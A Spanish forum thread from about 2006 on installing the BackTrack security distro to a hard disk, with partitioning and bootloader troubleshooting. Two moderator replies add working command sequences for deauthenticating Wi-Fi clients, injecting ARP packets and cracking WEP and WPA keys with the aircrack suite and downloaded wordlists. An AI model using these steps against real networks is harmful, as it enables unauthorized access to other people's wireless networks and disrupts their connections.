Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
04-Julio 11:03:37 am (Sábado)
Inicio Ayuda Ingresar Registrarse
Noticias: Aconsejamos visitar unmundolibre.es       Live CD wifiway-1.0 Final         Lean las normas, gracias

Agregate al nuevo feed RSS 2.0 de seguridadwireless y mantente informado de forma resumida ===>
+  Seguridad Wireless
|-+  Tecnología wireless - wifi
| |-+  Universo Wireless (Moderadores: Elena_FranciX, thefkboss, βerni69)
| | |-+  Instalar Back|Track en el HD de tú PC
Páginas: 1 Ir Abajo Imprimir
Autor Tema: Instalar Back|Track en el HD de tú PC  (Leído 9773 veces)
Elena_FranciX
Moderador
Desconectado Desconectado

Mordedor@

« : 28-Mayo 22:48:52 pm (Domingo) »

Baktrack - final;
http://www.remote-exploit.org/index.php/BackTrack_Downloads

enlace actualizado a 19 de agosto de 2006

1º VAMOS A PARTICIONAR EL HD [*Disco Duro]
cLick en "Inicio" | backtrack | Misc | QTParted

Se nos abrirá QTParted, y veremos algo así (si disponemos de un Disco Duro físico...

Con el ratón derecho cLicka´s sobre dev/hda1 y en el despegable sobre "make a new partition table", le das a aceptar ...

y cte colocas sobre ...

01    /dev/hda1  "ratón derecho" create/crear

Ahora se abre una ventana donde debes de seleccionar;
* Crear como PARTICION PRIMARIA
* PARTICION tipo Ext2
*Tamaño ponerlo en Gigas (las que tú decidas, menos de 4 no le coloques) la KDE de Back|Track come más que el Gnome de Troppix entre otras...

le das a OK, y lo mismo para particionar la Swap

* La partición SWAP tu decides la cantidad de HD que quieres desperdiciar, dispones, o estimes, mi consejo es que coloques la mitad de la RAM que disponga tú maquina 512/256 y te pases por el hilo de como instalar Troppix en HD y eches un ojo para solucionar el posible problema de RAM/SWAP...
Todo va en función de la RAM fisica y el HD disponible de tu PC, en cualquier caso no se trata de desperdiciar disco

Código:
RAM 512 / Part. Swap 256
RAM 10240 / Part. Swap 512 (yo le podría 256)

*HILO;     Instalando TROPPIX & Windows XP en HD sin pelearse
http://foro.elhacker.net/index.php/topic,123682.0.html

* Crear como PARTICION PRIMARIA
* PARTICION tipo LINUX-SWAP
*Tamaño ponerlo en Gigas (las que tú decidas)

Una vez tenemos los cambios hechos en nuestro HD

cLickáremos sobre "operatión´s" para que proceda a particionar nuestro HD

2º VAMOS A INDICAR LA RUTA DE INSTALACION DEL LIVE CD AL HD

Junto a Inicio tenemos una ventana de la Shell (interprete de comandos) cLickámos sobre la Terminal...

Y tecleemos lo siguiente;

Código:
ls /mnt
------------ [aparecerán los dispositivos flopy hdc cd rom...]
mkdir /mnt/hda1
mount /dev/hda1 /mnt/hda1
exit

3º VAMOS AL PASO DE INSTALACIÓN DEL LIVE CD

Volvemos a INCIO, System, Backtrack Installer

En la ventana que se desplegó:

Source;   /boot
Install BackTrack; /mnt/hda1
Write MBR to; /dev/hda1 [En mi caso hda3]

Método de Instalación REAL 2550 MEGAS REQUERIDO
cLik en Install

Cuando acabe, aceptas, reinicias y no olvides sacar el LIVE CD de Back|Track

F.A.Q

¿Hace falta tener que montar el hda1?
F.A.Q
Código:
ls /mnt
mkdir /mnt/hda1
mount /dev/hda1 /mnt/hda1
exit

Partinos de que vamos a instalar el LIVE CD, montado en el CD/Rom, debemos de señalarle la ruta donde queremos alojar el SO.

Y si tenemos instalado el xp y lo queremos maquear con el backtrack... en esta versión se ha de tocar el lilo?

XP & Back|Track, sin problemas, siempre que las 2 primeras sean PARTICIONES PRIMARIAS (extendidas daran problemas a la hora de Linkar el HD/BOOT/BIOS/MBR)
El mismo proceder, particionar HD, dejando hda1 para XP, hda2 para Back|Track, y al final del disco la PARTICION para Linux-Swap (ver ejemplo del hilo Troppix/XP) es de suponer que LiLo, arrancara con los 2 SO a elegir (por defecto XP)

cómo poder conectarte a inet con el backtrack

COPY PEGO de; http://foro.elhacker.net/index.php/topic,123285.msg576074.html#msg576074

Dios mio nadie sabe instalar una red inhalambrica desde backtrack es que nadie me contesta y si no lo hacen ustedes como voy a aprende a hacerlo???

Por favor una solucion

COPY

Comandos Entorno De Red

En Entorno de Red

* host: Determina la dirección IP de un "Host" , host -a despliega toda la información de DNS.

* ifconfig: Permite configurar una interfase de Red y ver el "status" de ésta.Esa de la forma ifconfig <interfase> , ejemplo: ifconfig eth0

* ifup: Habilita la interfase especificada,ejemplo: ifup eth0 .

* ifdown: Deshabilita la interfase especificada,ejemplo: ifdown eth0 .

* netstat -a: Todas la conexiones de Red originadas y recibidas por el "Host"

* netstat -r: Muestra la tabla de ruteo "routing table" del sistema

* netstat -i: Estadisticas de red de cada interfase

* nslookup: Busca información en los servidores DNS,ejemplo: nslookup -query=mx osomosis.com , si no se especifican parametros se entra en modo interactivo

* ping -s 1016: Manda paquetes de ping de 1024 bytes (header 8 bytes), mientras que el "default" es 512.

* route add: Permite agregar tablas de ruteo de y hacia el "Host". Ejemplo: Para guiar toda la información de la red 206.171.55.16 netmask 255.255.255.240 via la interfase eth0 :

Código:
route add -net 206.171.55.16 255.255.255.240 eth0

Para rutear todo el trafico por cierta interfase ("Default Gateway"):

Código:
route add default gw 206.171.55.51 eth0

Esto enviará toda la infromacion por la direccion 206.171.55.51

# route -n: Despliega la tabla de ruteo del "Host". NOTA: Debe de estar "IP Forwarding" ON en /etc/sysconfig/network , además el "kernel" debe de estar configurado para "IP Forwarding" .

# smbclient: Funciona como un cliente FTP, que simula conexiones que serán realizadas através de Samba.

# tcpdump: Permite el "debugging" de una interfase en el host.

# testparm: Verifica la validez del archivo smb.conf utilizado por Samba.

Con estos cmd y con los de la chinchetas para redes wireless ya hay para entretenerse un rato...
aLe, a probar y despues a contarlo en el foro, que es para compartir experiencias, je

Ummm se puede realizar la partición si ya tienes un windows xp puesto?? O tienes que tener el hd vacio?

RE; Si se quiere instalar junto a XP, pues el mismo proceder que con Troppix/XP, 3 particiones PRIMARIAS
Código:
1º XP
2º Backtrack
3º Swap

http://foro.elhacker.net/index.php/topic,123682.msg574857.html#msg574857

XP ya instalado ¡ok! con QTParted [INCLUIDO EN la LIVE CD Back|Track] o con gparted-livecd-0.2.5 [Notes] (2006-05-16 11:32) se puede descargar desde;
Código:
http://sourceforge.net/project/showfiles.php?group_id=115843&package_id=173828
* aconsejable redimensionar desde un SO UniX, desaconsejado PMagic u similares desde Windows... es una opinión personal.

Redimensionas tú XP ¡Esto no elimina tu SO Windows!

Ejemplo tú HD es de 60 Gb y tienes XP
cLick ás sobre tu hda (Disco Duro 0 ó hd0,0) y le dás a redimensionar (nunca formatear ene se supuesto) y escoges el tamaño que quieras 10 o 12 Gb irian bien, dejando el espacio libre al final de es partición que pretendes hacer...

Despues con el espacio restante, haces la 2ª partición hda2, para Back|Track, hay le das a crear, e importante con "ext2"y que sea PRIMARIA, nunca extendida (solo hay que fijarse un poco)

Por último esta el asunto de la partción Linux-Swap con "ext-swap"
* este punto desarrollado aquí; http://foro.elhacker.net/index.php/topic,123682.msg575819.html#msg575819

Fijate en la imagen:
hda1 con extension NFTS ---> WINDOWS
hda2 con extensión ext3----> Linux (tu la colocas en Ext2 que a Ext3 ya se encargara el SO en clocarlo tras la instalación
hda3 con extensión linix-swap--> en este caso estas tres son PRIMARIAS

« Última modificación: 19-Agosto 16:01:32 pm (Sábado) por Elena_FranciX » En línea
Hwagm
Administrador
*

« Respuesta #1 : 30-Mayo 01:18:02 am (Martes) »

http://hwagm.elhacker.net/htm/backtrack.htm

Elena_FranciX
Moderador

Mordedor@

« Respuesta #2 : 15-Junio 15:14:59 pm (Jueves) »

Modo rápido de cracking WEP con Back|Track

•   las tarjetas -REBELDES- de Atheros (requiere instalación en HD), si te dan problemas en la reinyección desde el Live CD
Instalando
•   * Abre el instalador, del menú de Kde.
•   Fijar tus parámetros del disco duro (debe ser auto).
•   ComIenza la instalación y espera  entre 15/20 minutos, (El tiempo real de espera que dependera de tu hardware.)
 ¡Una vez que terminado, reinicia el PC, y extrae el CD (que el LCD expulsara .)

•   Nota, esta versión B|T Final, instala Lilo, si ya dispones de otro Linux bajo Grub, no te sobrescribirá el MBR, pero deberás de editar una nueva línea a mano de tu Grub desde el otro SO Linux, si solo dispones de B|T no tendras problemas si instalas junto a XP, y tienes problemas (como que solo arranque en entorno XP) postea y lo arreglamos…

Guía para gente REALMENTE<NOTA: Intenta no funcionar bajo las X´s  siempre que te sea posible,
Estoy utilizando una tarjeta ath0. (Atheros), otras marcas de chiptset se denominan de distinto modo...

###############################
Código:
Login; root
passwd: toor
Slax; startx
conexion al sistema abrimos Konsole (Shell terminal)

Código:
airodump ath0 outfile 0 1

ALT F2

Nueva Konsole, conexion al sistema

Airodump
Ya en modo monitor,
Código:
airodump ath0 dump CHANNEL 1
channel o para todos, hasta el 11 en España...
1 salva IV´s (solo el nº de canal, salva *.cap)
Deautentificación:
Código:
aireplay -0 10 -a BSSID -c STATION ath0
Se trata de forzar al cliente a reautentificarse en la Red BSSID/MAC y Station/Mac ((server ARP solicita la ESSID))
* Antes de fijar del ataque del deautentificación necesitamos instalar aireplay para esperar a escuchar la petición del ARP
ARP inyección
Código:
aireplay -3 -b BSSID -h STATION -x 500 ath0
* escuchar una petición del ARP que viene del MAC/STATION  dirigido al MAC/BSSID del APs, entonces difunde esa petición unas 500 veces por segundo desde tu tarjeta de Atheros

Código:
aireplay ath0 -1 0 -e ESSID -a BSSID -h CLIENTMAC/0:1:2:3:4:5
aireplay ath0 -3 -e ESSID -b BSSID -h CLIENTMAC/0:1:2:3:4:5 -x 985

Si estás próximo al AP, y  no esta protegido contra la inyección de paquetes, deberás revisar “desde” ALT F1 (airodump) la reinyección  de paquetes.

NOTA , Si el AP  no difunde su ESSID, prueba a deautentificar clientes y forzar la conexión para tener una ocasión de encontrar el ESSID mediante este comando.

Código:
aireplay ath0 -0 135 -a BSSID -h CLIENTMAC/0:1:2:3:4:5

WEP

Una vez que comiences a generar los paquetes necesarios puedes abrir aircrack  (puede trabajar durante el ataque -3.)
Hay muchas opciones que puedes utilizar  Aircrack en el proceso de crackeo...
Sin embargo, puedes intentar este comando si realmente deseas (recordar que para esta prueba nombramos el archivo outfile.ivs) comprueba que no se renombro a outfile-01 si te falla…
Opcional
Código:
aircrack -a 1 -b APMAC outfile.ivs

Este comando le indica a aircrack que intenta crackear una llave de WEP, leyendo en el archivo de outfile.cap, usando solamente los paquetes que vienen de la dirección MAC del AP auditado. Es un comando básico de aircrack y puede tardar mucho incluso con una llave simple
Recomendable
Código:
aircrack -a 1 -i 1 -n 64 -m CLIENTMAC -b APMAC outfile.ivs

En un Pentium M portátil de 1.3 Ghz con Mb 512  el 1º comando después de 3 horas no funciono.  Tongue

El 2º comando la encontro en 20 minutos  Grin

En un P4 sistema de 3.2 el 1º comando tomó varias horas para encontrar un trozo de la WEP -incompleto-  Huh, mientras que el 2º comando tardo menos de un segundo.   Grin

Próxima consulta, Back|Track y WAP...

Las quejas al administrador, los aplausos a la señora...
Besos para ellas, y patadinas en los ..... para ellos
« Última modificación: 15-Junio 15:59:00 pm (Jueves) por Elena_FranciX » En línea
Elena_FranciX
Moderador

Mordedor@

« Respuesta #3 : 15-Junio 15:38:13 pm (Jueves) »

UY´s ¿problemas con la versión-ng de la SUITE aircrack dichosa? en el último B|T je nadíe dijo que estar a la última moda no fuera costoso jejeje Tongue o bien bajas a la versión anterior, o aprendes con la nueva-ng los nuevos cmd´s ******-ng    Undecided

Siempre te queda volver al viejo (Feb-2006) Auditor uno de los papis de B|T donde te funcionara lo anterior, pero ojo, esa machacara tú Grub, y ademas pondra la distro de seguridad en primer lugar, y al Guindos lo mandara a segundo plano (comprobado)  :Smiley

Soluciones p@ toóos

Intentar lo siguiente:

Test #1

Código:
switch-to-hostap

ahora

Código:
airodump-ng -w /tmp/test ath0

o

Código:
airodump-ng -w /tmp/test wifi0

Test #2

igual con otros driver´s

Código:
switch-to-wlanng

seguido

Código:
airodump-ng -w /tmp/test wlan0

o

Código:
airodump-ng -w /tmp/test wifi0

Si el AP se configura para autentificado en abierto, entonces

Código:
aireplay-ng -1 0 -e <bssid> -a <MAC of AP> -h 00:11:22:33:44:55 <iface>

aireplay-ng -3 -b <MAC of AP> -h 00:11:22:33:44:55 <iface>

El ataque a generara  ARPs en este caso tu

Código:
airodump-ng --w <outfile> -c <channel of AP> -ivs <iface>

(airodump-ng debe funcionar antes de los comandos) mostrando los IVs generados.

Dependiendo de la longitud de la llave, alrededor 300,000 IV´s (para 64 bit key-WEP) y/o 700,000 ivs (for 128 bit key- en realidad 108 Bit), puedes arrancar;

Código:
aircrack-ng -x -0 <outfile.ivs>

y comenzar el proceso cracking

Cerramos con WPA

Abrir 1ªconsola teclear:
Código:
airmon-ng start ath0

Abrir 2ª consola teclear:
Código:
airodump-ng ath0 -w cap -c 11

Abrir 3ª consola teclear:
Código:
aireplay-ng --deauth 5 -a <MACAP> -c <MACClient> ath0

Abrir 4ª  consola teclear:
Código:
aircrack-ng -w wordlist.txt cap-01.cap

Nota: airodump-ng salva los datos como "cap-01.cap" no "cap.cap" a tener en cuenta a la hora de llamar al diccionario ... avisados estais

Arrancando el diccionario/ wordlist:
Código:
cowpatty -f wordlist.txt -r wpa -s <ssid> -v
o
Código:
aircrack-ng -w wordlist.txt wpa

* Lo máximo que consegui fue 1 handshake, sin resultados positivos, con varios diccionarios, creo que 4 es el nº de HandShakes buenos... estamos de pruebas... a falta de que alguien entre a corregir-nos, lo cual sería de agradecer... Grin

1º Descargar diccionario de;
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

ALL; Download-Link:http://rapidshare.de/files/22801890/all.gz.html
Spanish; Download-Link:   http://rapidshare.de/files/22802040/lower.gz.html
Pass-Tipicas; Download-Link:   http://rapidshare.de/files/22802100/password.gz.html

Más LINK, los mismos files:
* ftp://ftp.openwall.com/pub/wordlists/languages/Spanish/
* ftp://ftp.openwall.com/pub/wordlists/passwords/
* ftp://ftp.ibiblio.org/pub/linux/distributions/openwall/wordlists/languages/

Listas de Palabras - WordLists para password Cracking
http://www.hackemate.com.ar/wordlists/
* pide pass y registro en page (si tienes problemas envia MP)

http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/wordlists/

2º Hacer un diccionario. [/center]

Código:
# zcat all.gz | egrep -v '^#' > dic
« Última modificación: 15-Junio 18:09:02 pm (Jueves) por Elena_FranciX » En línea
Hwagm
Administrador
*

« Respuesta #4 : 15-Junio 17:21:41 pm (Jueves) »

Has metido tanta tralla, que no puedo ni digerirla.

De refilon he liedo algo como que hacian falta 4 HandShakes buenos, bueno yo difiero en eso.

Mis pruebas fueron con un mismo PC y 3 tarjetas, 1 normal, 1 ataque 0 + sniffar y la 3 como analizador secunadia, y un 4 equipo que era un vigila bebe, ojo todo en linux, pero con 1 solo HandShake me valio.

A las pruebas me remito:

- Manual seguridad avanzada WPA (uno de mis 1 manuales)

http://hwagm.elhacker.net/wpa/wpa.htm

con cientos de miles de visitas en un año.  Grin Grin

Todo esto debria ir añadiendolo a mi pagina en los 3 seccions que abri contus trabajos, pero el viernes empiezo a trabajar y durannte un tiempecito dejare un poco de lado el HW, de hehcho ya curse baja como moderador en el foro.elhacker.net, por aqui me ire pasando , pero la web la dejare tal cual.

Aunque un copy /pega si creo que pueda hacer algun fin de semana.

Quizas este o los proximos.

Buen trabajo.

Elena_FranciX
Moderador

Mordedor@

« Respuesta #5 : 15-Junio 17:58:04 pm (Jueves) »

Mis pruebas fueron con un mismo PC y 3 tarjetas, 1 normal, 1 ataque 0 + sniffar y la 3 como analizador secunadia, y un 4 equipo que era un vigila bebe, ojo todo en linux, pero con 1 solo HandShake me valio.

Supongo que dependera de la Passphrase, del diccionario y lo fácil/dificil del asunto

Yo capture 1 handshake (saludo/apreton de manos) y se ve que no hicimos migas, en algún foro "guiri" leí que con 4 la cosa no falla, el caso es que todo depende de varios factores.

El 1º que el cliente este conectado (si no apaga y vamonos en WPA)

2º la calidad (no cantidad) de la señal, en mis pruebas, capturaba "purrela" de packet´s (tanto desde B|T como desde Troppix "to-p@-na" en WPA)
En tres pruebas distintas solo 1 handshake (uno por vez...  Lips Sealed)

Y mis diccionarios ¡nada de nada! (mi clave no esta pactada, je, supongo que me-sen-tiende)

El caso es que queria dar cera al B|T que parece parado u olvidado en la Red (al menos en esta tierra)

Se puede, se debe de ir puliendo, y creo que la gracia esta en ejercitar las distintas herramientas, no en pararse en un logro...

CCW7 se me resiste, me peleo con las "X" en Linux cuando consigo actualizar las librerias de Gambas, y de momento reniego de saltar a Mandriva, SuSe u otra distro que no sea especifica de Live CD (Hice mis pinitos con las knoppix, que no descarto de parchear, la 4.02 en CD, y la 5 en DVD, a espera de la 5 en CD, que me la pasan sino me equivoco hoy mesmo)

*  4 HandShakes supongo que sera para ir sobre seguro, haber si encuentro el extremo de mi alargador, y saco la antena de 9 DBI apantallando con un tetabrick (dicen-me que gano 3 Dbi) y capturo con más clarividencia...

Mientras tanto se admiten todo tipo de correcciones (pa mejor) pero a ser posible usando las distros de Seguridad, B|T, Troppix, se admite Auditor, (y Slax se me cuelga) o el knoppix puro y duro parcheado y vestidito para la ocasion de la seguridad en wireless, lo mas tardar...

Te puse como moderador de esta seccion , lee el IM que te mande, y ya me diras si lo aceptas o no.
Capiche?

ahora lo leo, en principio por mi no hay problemas ¿pagas extras de verano? jejeje, dias libres ¿hay que sacar al perro?
Ahora leo el mp, suelo usar el/mi correo pa dejarme enlaces y cosillas de interes a mi mesmo, ¡me escribo sol@ jijiji Lips Sealed
Hwagm
Administrador
*

« Respuesta #6 : 15-Junio 18:05:08 pm (Jueves) »

Claro las pruebas las hice con mi mismo equipo equipo a apenas 2 metros y es normal que con 1 bastara, pero si ya es dificil pillar uno, si la gente ve que se necesitan 4, ja ja, ya ni lo intentan.

Aqui pagamos igual que en elhacker.net, preguntale a Uxio, canido y a 02t, je je

pagamos caramelos, pero siempre que lo hayamos pillado cuando salen las carrozas el dia de reyes....... Grin Grin

La freuencia de entrada en el foro es la misma, solo que ahora tienes algunos botones mas para jugar, jeje. 

Elena_FranciX
Moderador

Mordedor@

« Respuesta #7 : 16-Junio 08:42:49 am (Viernes) »

# Pre:  como se apaga con el backtrack, to lo maximo que he hecho es shutdown now pero mevuelve a la pantalla de meter el user y password

* Re; prueba en consola poner shutdown -h now

Cool

#  comienzo automático en tablero del escritorio de KDE

Código:
*nano /etc/inittab

cambiar la línea siguiente:

Código:
id:3:initdefault:

a

Código:
id:4:initdefault:

Si quisieras que el leetmode comenzara automáticamente.

Código:
cd /root/.kde/Autostart

Código:
ln -s /usr/bin/leetmode leetmode

Eso creará un acoplamiento al leetmode en tu directorio de inicio.

Si deseas eliminar (como ejemplo) el molesto abrir del CD-ROM en reinicio y paradas, u variar algún parámetro de inicio o cierre, necesitas alterar algunas líneas.

Código:
cd /etc/rc.d

Código:
nano rc.6

Editar el código por lo siguiente

Código:
# eject cdrom devices
. ./usr/lib/liblinuxlive
#echo "Ejecting all CDROMs..."
#list_cdrom_devices | while read DEVICE; do
# cdrecord dev=$DEVICE -eject >/dev/null 2>/dev/null
# can't use eject because it's not working with our kernel
# eject -s $DEVICE >/dev/null 2>/dev/null
#done
echo "========================================"
echo "It's safe to switch the computer off now"
echo -ne "Press Enter to $command "
read junk
FileteConPatatas
*

« Respuesta #8 : 02-Agosto 22:09:39 pm (Miércoles) »

Hola Elena_FranciX, me voy ai nstalar el BackTrack en mi PC, ya que al usarlo me devuelve un error al intentar cambiar la mac (http://foro.seguridadwireless.net/index.php/topic,296.0.html), mi tarjetas es Atheros, y como he leido que puede ser que necesite que sea instaldo en el PC, voy aprobarlo. Pero tengo la siguiente duda queria realizarlo por el metodo que tu eliges las particiones, pero veo que dices esto:

las tarjetas -REBELDES- de Atheros (requiere instalación en HD), si te dan problemas en la reinyección desde el Live CD
Instalando
•   * Abre el instalador, del menú de Kde.

•   Fijar tus parámetros del disco duro (debe ser auto).

Si no lo hago Auto no me valdra, (Por auto entiendo que yo no soy el que hace y despues le indica las particiones al instlador)y en el caso de hacerlo de forma automatica, pierdo mi windows XP que ya tengo instalado.

Perdona por la pregunta se que es un poco tonta pero no consigo salir de dudas...
Elena_FranciX
Moderador

Mordedor@

« Respuesta #9 : 03-Agosto 01:01:29 am (Jueves) »

1º haces la partición como indica el manual

2º indicas la partición 2ª que acabas de preparar para B|T

Esta versión instala LILO (como info anecdotica)

si lo haces así conviviran XP y B|T, yo lo tengo a 3 bandas con Troppix y Grub es el que elige que arranca como gestor 1º
Elena_FranciX
Moderador

Mordedor@

« Respuesta #10 : 04-Agosto 00:27:49 am (Viernes) »

VIDEO de Cracking 128 bit WEP in 15 minutes! con Bact|Track

victres2
*

« Respuesta #11 : 10-Agosto 00:54:05 am (Jueves) »

Que tal, me he bajado 2 live cd's (backtrack y whoppix) la primera duda es como le hago para configurar mi pc con XP para que arranque primero desde la unidad D: , no creo que la solución sea retirar el disco duro cada vez que inicio el live cd,   ahora mi segunda duda, ya que lo he logrado arrancar, para instalarlo no detecta el disco duro, que hago? necesito que lo detecte para instalarlo. bueno gracias anticipadas y saludos.
Elena_FranciX
Moderador

Mordedor@

« Respuesta #12 : 10-Agosto 02:02:25 am (Jueves) »

Explicame eso de que no detecta el disco duro  Huh Huh Huh

Abres QTParted y que te dice???

Cuantas Particiones tienes?

Tienes Particion Magic desde Windows, en el peor de los casos?

Vamos a ver, lo de las únidades, es una jerga de Windows, que le da por renombrar cada particion lógica, además de que tiene la dichosa manía de querer instarse en la 1ª particion Primaria y estar solo

El HD y sus denominaciones es caso aparte a tu duda, al instalar B|T te instala LiLo, y anula el MBR sector de arranque de Windos, que se puede editar desde el mismo LinuX

Esta distro, B|T lleva entorno grafico KDE por lo que entras como usuario y para poder cambiar, editar ese file debes de hacerlo como "root" con permisos de usuario (no ocurre así con troppix que usa IcWm)
Por lo que deberas de editar el /menu.lst/ que andara por el boot, sellecionando o inviertiendo el orden de arranque de los SO...

En mi caso, quien manda es Troppix con Grub, edite el menu.lst y lo coloque por defecto XP 1º, Troppix 2º y B|T 3º (La verdad es que lo abro bien poco) me pica el empalagoso KDE ¡Brrggggg!
okzyd
*

« Respuesta #13 : 10-Agosto 22:58:33 pm (Jueves) »

Hola,

he seguido los pasos para instalar el B|T en mi pc portatil y en live todo funciona bien pero despues de instalarlo y arrancar en hd justo cuando deberia poner "root" me empiezan a salir muchos errores tipo:

/sbin/ldconfig: Input file /usr/lib/libgcc_s.so.1 not found
....
/sbin/ldconfig: /usr/lib/libgdm.so.3.0.0 is not an ELF file - it has the wrong magiv bytes at the start
....

y asi unos cuantos.

Alguien sabe a que puede ser debido? Obbiamente no me carga las X ni nada por el estilo.

Muchas gracias !
Elena_FranciX
Moderador

Mordedor@

« Respuesta #14 : 11-Agosto 00:02:11 am (Viernes) »

para cargar las "X" hay que logearse y hacer

# STARTX

libgcc_s.so.1 diria que es una librería

> When I start mozilla from xterm I can see a request for
> libgcc_s.so.1 and the jre is not detected in mozilla's plugin
> manager.

/sbin/ldconfig: /usr/lib/libgdm.so.3.0.0 is not an ELF file - it has the wrong magiv bytes at the start
rm /usr/lib/libndbm.so
ln -s /usr/lib/libgdbm.s0.3.0.0 /usr/lib/libndbm.so

Puede que tu Live CD se grabara mal, que el CD este rayado que la Unidad Optica sea muy sensible

no se....

¿Que marca de PC es? ¿no sera HP?  Grin
JordiMac
*

« Respuesta #15 : 19-Agosto 13:05:04 pm (Sábado) »

Elena_F  Grin Grin Grin

En Linux nada dura mas de 3 meses, con lo que tu imagen ISO ya no esta en el servidor  Grin Grin

hay que actualizar

http://www.remote-exploit.org/index.php/BackTrack_Downloads

supongo será la ultima versión la 26-05-06 ?

saludos

PD: KDE no te gusta  :o :o
Kydow
*

« Respuesta #16 : 07-Septiembre 18:57:38 pm (Jueves) »

Hola por fin he podido instalar en un disco duro el Backtrack pero tengo unas dudas.

la primera es que cuando arranco con el CD y me hago las 2 particiones ( una dev/hda1 de 8GB y la otra linux Swap de 1GB) ma las hace bien pero cuando me voy a terminal me pone slax ~ # y no pone lo del tutorial que seria root@slax:~#

La segunda cuando pongo ls /mnt me aparecen las unidades y otra que pone hda1 pero al poner mkdir /mnt/hda1 me da un error diciendo algo asi como que no puede montar hda1 y como soy mu burro sigo pa lante y pongo mount.... y todo bien hasta instalarlo. No se si es normal ese error.

Luego todo parece bien cuando arranco desde el disco duro, pero cuando reinicio se me borran las paginas que por ejemplo meto en elfavoritos en el mozilla, Es normal o es una mala instalacion?

Perdonad si algo de esto son chorradas pero llevo 3 meses para instalar el backtrack porque con el ordenador que tengo no habia narices pero con una placa vieja he podido instalarlo y ya me funciona en el ordenador nuevo.
Hijack
*

« Respuesta #17 : 11-Septiembre 11:35:13 am (Lunes) »

Hola, tengo problemas con  Back|Track en mi portatil. Mi problema es este, yo tengo mi XP ntfs (hda1)y otro de datos fat32 (hda5), luego tengo dos particiones mas para linux (hda4) y la swap(hda3), los hda me los asigna linux pero no estan en ese orden en el disco duro. Tenia instalado Knoppix y decidi instalarme Back|Track, formateo la partición, instalo B|T y asta ahi todo OK, me imaginaba que tendria que modificar lilo para poder arrancar los 2 SO pero al reiniciar solo me sale Slax(B|T) y esto es lo que puse en lilo:

boot = Huh? (el de defecto, no recuerdo)
prompt
timeout = 20
bitmap=/boot/splash.bmp
change-rules
reset
vga = 0x317
image = /boot/vmlinuz
  root = current
  label = slax
  read-write
other = /dev/hda1    Añadi esta linea y al arrancar solo aparece la etiqueta de win y no carga nada
label = Windows 

Tampoco me conectaba a internet y para volver a Win instale de nuevo knoppix... y todo esto por mi dichosa ipw2100!!!
Espero que alguien me puedo dilucidar que pueda pasarme porque me ha gustado mucho B|T y encima no tengo problema con mi ipw!!

Saludos
Elena_FranciX
Moderador

Mordedor@

« Respuesta #18 : 20-Septiembre 17:11:25 pm (Miércoles) »

Precesamente el orden verdadero de las particiones es el que asigna Linux, Windows las falsea de hecho desde el administrador de dispositovos podemos renombrarlas al gusto

Salvo con "c:\" ya que windows tiene la extraña manía de querer estar solo en el PC

Depende de que directorio partas, así te muestra la info desde la ventana de terminal:
me pone slax ~ # y no pone lo del tutorial que seria root@slax:~#
Todo depende de que nombre le asignes ¿lo nombrastes root?

En entorno KDE se entra como usuario, es asi de pijo, no desde IceWM u otro enorno mas humilde, prueba ha hacerte con los derechos del super usuario (lo tienes mas arriba)

Entra en las opciones del navegador y habilita la memoria como lo tienes configurado en windows, para los temporales asignandole espacio en HD
Elena_FranciX
Moderador

Mordedor@

« Respuesta #19 : 05-Diciembre 15:28:07 pm (Martes) »

BackTrack Live-CD

http://www.youtube.com/watch?v=bghyIUjzWiw

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions.

This video as been recorded in a VMWare Workstation machine.

This distribution is good for penetration testing, computer forencsis, hacking AP's and more

backtrack boot screen

http://www.youtube.com/watch?v=it98r5NHZG4

Backtrack security distibution boot screen
okzyd
*

« Respuesta #20 : 05-Diciembre 21:31:52 pm (Martes) »

Hola!!

He instalado esta version de B|T en mi hd junto al WinXP y al reiniciar el equipo no me salta el selector de Sistema Operativo, vamos como si no se hubiera instalado ningun gestor de arranque!!

Es posible?? Como puedo solucionarlo pk he perdido el acceso a windows.

Grácias!
Elena_FranciX
Moderador

Mordedor@

« Respuesta #21 : 05-Diciembre 23:11:50 pm (Martes) »

Como bien apuntas, se soluciona instalando el gestor de arranque, marca la pestaña del "Grub" o del Lilo (no recuerdo ahora) al final de la instalación, si tienes otra distro como Troppix más facil, añade una linea en el menu.lst del Grub indicando el número de HD donde metiste tú B|T y listo
okzyd
*

« Respuesta #22 : 06-Diciembre 15:55:38 pm (Miércoles) »

Como bien apuntas, se soluciona instalando el gestor de arranque, marca la pestaña del "Grub" o del Lilo (no recuerdo ahora) al final de la instalación, si tienes otra distro como Troppix más facil, añade una linea en el menu.lst del Grub indicando el número de HD donde metiste tú B|T y listo

No simplemente tenia el winxp. Al finalizar la instalacion? despues de copiar los archivos me dijo Finlaizar y al reiniciar ya me entro directo a B|T Sad

Debo reinstalar B|T y marcar lo del lilo... pero dnd lo marco? Gracias
uNbAs
Administrador
*

« Respuesta #23 : 06-Diciembre 16:49:43 pm (Miércoles) »

Buenas tardes a todos, Elena_FranciX tengo un problema!!!

Estoy a la espera de q se finalice el Live-CD de la web q como sabras esta basado en back track, bueno el rollo es q me he descargado la version 2.0 beta, y a pesar de q no trae la aplicacion QTparted en el menu inicio le he estado buscando y la he encontrado.

El tema esta q no doy instalado el back|track de ninguna manera he probado con el disco formateado sin particiones ni nada he pobado con tres particiones y tampoco, ya no se q mas hacer!

Me puedes echar una mano?
« Última modificación: 08-Diciembre 01:54:40 am (Viernes) por unbas » En línea

Cada cosa en su sitio y un sitio para cada cosa
Usa la busqueda
Hwagm
Administrador
*

« Respuesta #24 : 11-Diciembre 11:55:03 am (Lunes) »

donde dice:

Código:
Source;   /boot
Write MBR to; /dev/hda1 [En mi caso hda3]

debe decir
Código:
Source;   /boot
Write MBR to; /dev/hda [En mi caso hda]

Porque el lilo se instala en el MBR del disco duro, no en una particion de ese disco duro, y eso es valido para los demas manuales de livecd

rh3nt0n
Administrador
*

" si, vis pacem , para bellum "

« Respuesta #25 : 11-Diciembre 12:05:02 pm (Lunes) »

personalmente como gestor de arranque prefiero GRUB , claro que yo al tener instalado de primeras ubuntu lo tengo facil ..

es solo añadirle estas lineas al menu.lst de la carpeta GRUB en boot , en mi caso sda4 en hd0,3 ..:

Código:
title            backtrack on sda4
root             (hd0,3)
kernel           /boot/vmlinuz ro  root=/dev/sda4  quiet SELINUX_INIT=NO

ya me parecia a mi que era problema del gestor de arranke ..

saludos

No hay pasado ni futuro en la existencia, la existencia es solo presente.
Hwagm
Administrador
*

« Respuesta #26 : 11-Diciembre 12:10:45 pm (Lunes) »

